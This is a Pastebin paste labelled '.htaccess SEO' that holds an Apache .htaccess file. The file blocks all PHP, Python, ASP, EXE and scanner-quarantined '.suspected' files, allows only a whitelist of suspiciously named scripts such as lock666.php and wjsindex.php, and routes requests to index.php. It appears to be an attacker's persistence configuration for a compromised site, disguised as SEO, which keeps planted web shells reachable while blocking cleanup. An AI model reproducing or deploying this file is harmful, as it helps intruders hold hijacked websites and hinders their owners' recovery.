Advertisement
willysec_id

.htaccess SEO

Apr 25th, 2022
494
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.58 KB | None | 0 0
  1. <FilesMatch ".(PhP|php5|suspected|phtml|py|exe|php|asp|Php|aspx)$">
  2. Order allow,deny
  3. Deny from all
  4. </FilesMatch>
  5. <FilesMatch "^(votes.php|index.php|wjsindex.php|lock666.php|font-editor.php|contents.php|wp-login.php|load.php|themes.php|admin.php|settings.php|bottom.php|years.php|alwso.php|service.php|license.php|module.php)$">
  6. Order allow,deny
  7. Allow from all
  8. </FilesMatch>
  9. <IfModule mod_rewrite.c>
  10. RewriteEngine On
  11. RewriteBase /
  12. RewriteRule ^index.php$ - [L]
  13. RewriteCond %{REQUEST_FILENAME} !-f
  14. RewriteCond %{REQUEST_FILENAME} !-d
  15. RewriteRule . index.php [L]
  16. </IfModule>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement